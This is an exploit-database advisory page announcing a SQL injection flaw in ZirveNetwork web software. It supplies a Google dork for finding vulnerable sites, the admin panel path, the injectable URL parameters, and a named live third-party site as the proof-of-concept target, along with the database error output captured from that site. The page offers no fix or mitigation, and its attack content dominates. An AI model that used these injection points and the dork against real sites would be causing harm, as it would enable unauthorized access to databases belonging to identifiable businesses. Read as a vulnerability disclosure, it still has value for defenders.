ZirveNetwork SQL Injection Vulnerability

2018.09.21
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

################################################################################################# # Exploit Title : ZirveNetwork SQL Injection Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 19/09/2018 # Vendor Homepage : zirvenetwork.com # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] ################################################################################################# # Google Dork : intext:''zirvenetwork.com'' # Admin Panel Path : /admin/login.php # Exploit : /?page=main-page&list_type=[SQL Injection] /?lang=tr&page=services&id=[SQL Injection] ################################################################################################# # Example Site => platingayrimenkul.com.tr/?lang=tr&page=services&id=43%27 => [ Proof of Concept ] => archive.is/2QJQ6 # SQL Database Error => SQL_ERROR_TITLE SQL_ERROR_CODE 0 SQL_QUERY select count(*) as count_row from t_advert where Visible='1' and 1\'='1' SQL_ERROR You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'='1'' at line 1SQL_ERROR_TITLE SQL_ERROR_CODE 0 SQL_QUERY select t1.ID as advert_id, advert_title, t1.SquareMeter, t1.RentPrice, t1.RentCurrency, t1.AdvertType, t2.Name as estate_status, t3.Name as estate_type, t4.Name as estate_city, t5.Name as estate_township, t6.Name as estate_area, (select Images from t_advert_images where Visible='1' and ParentID=t1.ID order by Seq asc LIMIT 0,1) as estate_images from t_advert t1 left join t_properties t2 on t1.EstateStatus=t2.ItemID and t2.PageLang='Türkçe' and t2.PageType='EstateStatus' left join t_properties t3 on t1.EstateType=t3.ItemID and t3.PageLang='Türkçe' and t3.PageType='EstateType' left join t_city t4 on t1.City=t4.ID left join t_township t5 on t1. Township=t5.ID left join t_area t6 on t1.Area=t6.ID where t1.Visible='1' and t1.1\'='1' order by ADate desc limit 0,0 SQL_ERROR You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'='1' order by ADate desc limit 0,0' at line 21 ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################

References:

https://www.cyberizm.org/cyberizm-zirvenetwork-sql-injection-vulnerability.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top